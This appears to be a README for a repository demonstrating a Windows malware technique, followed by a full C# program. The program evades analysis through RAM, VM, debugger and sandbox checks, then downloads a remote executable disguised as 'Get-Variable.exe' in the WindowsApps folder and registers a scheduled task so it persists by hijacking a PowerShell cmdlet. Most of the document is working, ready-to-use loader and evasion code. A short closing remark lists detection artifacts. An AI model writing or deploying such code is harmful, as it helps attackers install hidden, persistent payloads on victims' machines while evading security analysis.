This repository contains C# code that combines a PowerShell/Task Scheduler persistence technique with several anti-VM and anti-sandbox techniques. The program uses four anti-VM/anti-sandbox checks and one persistence mechanism built on PowerShell and the Task Scheduler.
Persistence (PowerShell + Task Scheduler):
- Downloads an executable from a web server with `WebClient` into the per-user `%LOCALAPPDATA%\Microsoft\WindowsApps` folder.
- The executable is saved under the name `Get-Variable.exe`.
- Creates a scheduled task that runs the `Get-Variable` command in PowerShell. `Get-Variable` is a legitimate cmdlet that lists the PowerShell variables in the current console, so the task action looks harmless.
- When the task fires, the downloaded binary runs instead of the PowerShell cmdlet.
- This works because `WindowsApps` is on the user's PATH by default: when an executable named `Get-Variable.exe` is present there, PowerShell executes that exe rather than the legitimate command.
Anti-VM / anti-sandbox checks:
- Reads the installed RAM; if it is less than 4 GB the program terminates.
- Checks whether it is running in VMware or VirtualBox; if so, it terminates.
- Checks whether a debugger is present; if so, it terminates.
- Checks whether it is running in a sandbox; if so, it terminates.
- You can add memory insertion techniques to bypass sandboxes.
- You can add human-interaction checks (for example, waiting for mouse movement or clicks) to bypass sandboxes.
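The two parts of the program described above, written out as an added C# example; this is illustration code, not the repository's own source. It targets a .NET Framework console application and needs a reference to `System.Management.dll` for the WMI queries. The payload URL, the task name and 30-minute schedule, the 4 GB and five-minute thresholds, and the list of sandbox hook DLLs are illustration choices, not values taken from the repository.

```csharp
using System;
using System.Diagnostics;
using System.IO;
using System.Management;                 // add a reference to System.Management.dll
using System.Net;
using System.Runtime.InteropServices;

// Added example, not the repository's code: the four environment checks and the
// Get-Variable.exe persistence step from the README, as one console program.
// URL, task name/schedule, thresholds and DLL names are assumptions for illustration.
static class NativeMethods
{
    [DllImport("kernel32.dll")]
    public static extern bool IsDebuggerPresent();

    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);
}

static class EnvironmentChecks
{
    // Helper: run a WMI query and return the first row, or null when nothing matches.
    static ManagementObject FirstRow(string wql)
    {
        using (var searcher = new ManagementObjectSearcher(wql))
            foreach (ManagementObject row in searcher.Get())
                return row;
        return null;
    }

    // Check 1: physical RAM in GB. Sandboxes are often provisioned with less than 4 GB.
    public static double TotalRamGb()
    {
        var cs = FirstRow("SELECT TotalPhysicalMemory FROM Win32_ComputerSystem");
        return cs == null ? 0 : Convert.ToDouble(cs["TotalPhysicalMemory"]) / (1024.0 * 1024 * 1024);
    }

    // Check 2: hypervisor fingerprints in the manufacturer/model strings WMI exposes.
    public static bool LooksLikeVm()
    {
        var cs = FirstRow("SELECT Manufacturer, Model FROM Win32_ComputerSystem");
        if (cs == null) return false;
        string text = (cs["Manufacturer"] + " " + cs["Model"]).ToLowerInvariant();
        return text.Contains("vmware") || text.Contains("virtualbox") || text.Contains("innotek");
    }

    // Check 3: a managed (CLR) debugger or a native debugger attached to the process.
    public static bool DebuggerPresent()
    {
        return Debugger.IsAttached || NativeMethods.IsDebuggerPresent();
    }

    // Check 4: sandbox heuristics. Commonly cited sandbox hook DLLs loaded in-process,
    // or a machine that booted only minutes ago (fresh snapshot).
    public static bool LooksLikeSandbox()
    {
        string[] hookDlls = { "SbieDll.dll", "cmdvrt32.dll", "snxhk.dll", "api_log.dll", "dir_watch.dll" };
        foreach (string dll in hookDlls)
            if (NativeMethods.GetModuleHandle(dll) != IntPtr.Zero) return true;
        // Cast to uint so the TickCount wrap-around after ~25 days does not read as a fresh boot.
        return (uint)Environment.TickCount < 5 * 60 * 1000;   // 5-minute threshold is an assumption
    }

    public static bool ShouldTerminate()
    {
        return TotalRamGb() < 4 || LooksLikeVm() || DebuggerPresent() || LooksLikeSandbox();
    }
}

static class Persistence
{
    // %LOCALAPPDATA%\Microsoft\WindowsApps: per-user, writable, and on the user's PATH by default.
    static readonly string WindowsApps = Path.Combine(
        Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), @"Microsoft\WindowsApps");

    public static void Install(string payloadUrl)
    {
        Directory.CreateDirectory(WindowsApps);
        string target = Path.Combine(WindowsApps, "Get-Variable.exe");
        using (var client = new WebClient())
            client.DownloadFile(payloadUrl, target);

        // The task action only names the innocuous-looking cmdlet; PowerShell resolves it to the dropped exe.
        // Task name and 30-minute schedule are assumptions. Security event 4698 records the creation
        // when scheduled-task auditing is enabled.
        var psi = new ProcessStartInfo("schtasks.exe",
            "/Create /F /SC MINUTE /MO 30 /TN \"Get-Variable\" /TR \"powershell.exe -Command Get-Variable\"")
        { UseShellExecute = false, CreateNoWindow = true };
        using (var p = Process.Start(psi)) p.WaitForExit();
    }
}

static class Program
{
    static void Main()
    {
        if (EnvironmentChecks.ShouldTerminate()) return;          // quietly exit in analysis environments
        Persistence.Install("https://example.invalid/payload.exe"); // placeholder URL, an assumption
    }
}
```

A standard user can register a per-user task with `schtasks /Create`, so no elevation is needed; the trade-off is that the `schtasks.exe` process creation, the WMI queries against `Win32_ComputerSystem`, and a new executable appearing under `WindowsApps` are exactly the artifacts a detection engineer would hunt for when looking for this technique.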